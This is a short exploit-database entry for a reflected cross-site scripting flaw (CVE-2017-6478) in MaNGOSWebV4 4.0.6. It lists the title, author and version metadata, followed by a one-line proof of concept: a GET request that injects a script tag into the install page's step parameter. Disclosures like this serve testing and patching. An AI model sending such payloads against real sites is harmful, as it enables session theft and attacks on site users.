Share
## https://sploitus.com/exploit?id=PACKETSTORM:212429
# Exploit Title: MaNGOSWebV4  4.0.6 - Reflected XSS 
    # Date: 2024-10-26
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/paintballrefjosh/MaNGOSWebV4
    # Software Link: https://github.com/paintballrefjosh/MaNGOSWebV4
    # Version: 4.0.6
    # Tested on: Ubuntu Windows
    # CVE : CVE-2017-6478
    
    PoC:
    // Access the vulnerable URL and trigger the XSS payload
    GET http://mangoswebv4/install/index.php?step=%3Cscript%3Ealert(1)%3C/script%3E